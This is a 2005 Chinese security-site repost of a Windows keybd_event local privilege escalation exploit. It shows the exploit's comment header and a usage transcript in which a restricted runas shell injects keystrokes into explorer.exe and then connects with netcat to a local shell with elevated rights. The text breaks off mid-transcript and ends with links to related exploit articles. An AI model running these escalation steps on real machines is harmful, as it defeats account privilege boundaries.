Microsoft Windows "keybd_event" Local Privilege Escalation Exploit

文章整理:天天安全网   作者:佚名   发布时间:2005-09-09

漏洞资料:http://www.haxorcitos.com/MSRC-6005bgs-EN.txt
危险程度:中等
影响范围:Microsoft Windows 2000/XP/2003
解决办法:暂时没有解决方案

------------------------------------------------------------------------------

/*
* Microsoft Windows keybd_event validation vulnerability.
* Local privilege elevation
*
* Credits: Andres Tarasco ( aT4r _@_ haxorcitos.com <http://haxorcitos.com>)
* I馻ki Lopez ( ilo _@_ reversing.org <http://reversing.org> )
*
* Platforms afected/tested:
*
* - Windows 2000
* - Windows XP
* - Windows 2003
*
*
* Original Advisory: http://www.haxorcitos.com
* http://www.reversing.org
*
* Exploit Date: 08 / 06 / 2005
*
* Orignal Advisory:
* THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
* AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
* WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
*
* Attack Scenario:
*
* a) An attacker who gains access to an unprivileged shell/application executed
* with the application runas.
* b) An attacker who gains access to a service with flags INTERACT_WITH_DESKTOP
*
* Impact:
*
* Due to an invalid keyboard input validation, its possible to send keys to any
* application of the Desktop.
* By sending some short-cut keys its possible to execute code and elevate privileges
* getting loggued user privileges and bypass runas/service security restriction.
*
* Exploit usage:
*
* C:/>whoami
* AQUARIUS/Administrador
*
* C:/>runas /user:restricted cmd.exe
* Enter the password for restricted:
* Attempting to start cmd.exe as user "AQUARIUS/restricted" ...
*
*
* Microsoft Windows 2000 [Version.00.2195]
* (C) Copyright 1985-2000 Microsoft Corp.
*
* C:/WINNT/system32>cd /
*
* C:/>whoami
* AQUARIUS/restricted
*
* C:/>tlist.exe |find "explorer.exe"
* 1140 explorer.exe Program Manager
*
* C:/>c:/keybd.exe 1140
* HANDLE Found. Attacking =)
*
* C:/>nc localhost 65535
* Microsoft Windows 2000 [Versi

时间: 2024-09-26 11:41:08

Microsoft Windows "keybd_event" Local Privilege Escalation Exploit的相关文章

Microsoft Windows CSRSS Local Privilege Escalation Exploit (MS05-018)

文章整理:天天安全网   作者:佚名   发布时间:2005-09-09 漏洞资料:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0551危险程度:中等影响范围:Microsoft Windows 2000/XP/2003解决办法:http://www.microsoft.com/technet/security/bulletin/ms05-018.mspx -------------------------------------

Local Privilege Escalation for macOS 10.12.2 and XNU port Feng Shui

0x00 Introduction From yalu 10.2, we could learn lots of new exploit techniques especially the XNU port feng shui and kpp bypass. In this article, we discuss the technique detail about XNU port feng shui and transform this technique to macOS to gain

Local privilege escalation for OS X 10.11.6 via PEGASUS

0x00 Introduction Because of the PEGASUS apt issue on iOS, Trident exploit is very hot recently. From Lookout's report, there are three vulnerabilities in the Trident exploit: CVE-2016-4657: Visiting a maliciously crafted website may lead to arbitrar

安装Microsoft Windows 2000 恢复控制台

window|恢复|控制 2.在 CMD中,安装CD I386 目录下,键入: C :\> winnt32 /cmdcons 在出现的确认信息上点击"确定" 启动菜单中加入 C:\CMDCONS\BOOTSECT.DAT="Microsoft Windows 2000 Command Console" /cmdcons 并且复制所需的文件. 3. 重新启动计算机,选中" Microsoft Windows 2000 Command Console &

如何在 Java 应用程序中读取 8 位和 24 位 Microsoft Windows 位图(转)

window|程序 如何在 Java 应用程序中读取 8 位和 24 位 Microsoft Windows 位图在 Java 应用程序中加载位图文件的逐步指南 作者:Jeff West 和 John D. Mitchell 摘要目前,标准的 getImage() 方法仅支持 GIF 和 JPEG 图像.尽管存在用于读取 PNG(可移植网络图形)格式的 Java 例程,但我们还没听说过有用于读取 Microsoft Windows 位图图像的阅读程序.Jeff West 撰写的这篇技巧提供了加载

Microsoft Windows实时通信(RTC)客户端的媒体支持

摘要 Microsoft Windows 的实时通信(RTC)客户端由一系列核心组件构成,它提供了丰富 的通信特性.这些特性通过 Windows Messager 和其它一些使用了此应用程序编程接口( APIs)的应用程序展示给用户.本文将概述与媒体相关的特性以及这些组件提供的增强特 性.应用程序开发者或许想要将 RTC 特性 集成到自己的程序中以改进用户体验.开发者 还能利用 RTC 的特性构建自己的社区. 引言 Microsoft Windows XP 中结合与增强了丰富的通信特性,为 RT

IBM Connections Desktop plug-ins for Microsoft Windows新功能

概述 IBM Connections Desktop Plug-ins for Microsoft Windows 是一款提供更加方便更加快捷使用 IBM Connections Files 的桌面插件.使用 IBM Connections Desktop Plug-ins for Microsoft Windows 插件可以直接在用户桌面上查看与管理多个服务器上的文件,无需使用浏览器,一经推出就受到广大用户的青睐.随着 IBM Connections 4.0 的问世, 这款桌面插件的升级版也相

Mcad学习笔记之Microsoft Windows服务

Windows服务是在后台运行的 它没有用户界面,比较适合处理不要与用户交互的任务 它可以运行在win2000,winXp,WinNt等操作系统上 关于如何编写简单windows服务应用程序 大家可以参考 http://chs.gotdotnet.com/QuickStart/howto/default.aspx?url=/quickstart/howto/doc/SimpleService.aspx 我在这里就个人的学习心得,做了一个小总结: Microsoft Windows服务使用Syst

Microsoft Windows Server 2008 Beta 3VHD官方镜像下载_常用工具

微软在下载中心发布了Windows Server 2008 Beta3的下载.本次下载是VHD版本,RAR分卷压缩,大小2.85GB,可以用Virtual Server 2005 R2虚拟机直接运行,大约需要10GB的硬盘空间.对Windows Server 2008有兴趣的朋友们不妨一试. Microsoft Windows Server 2008 is the next generation of the Windows Server operating system that helps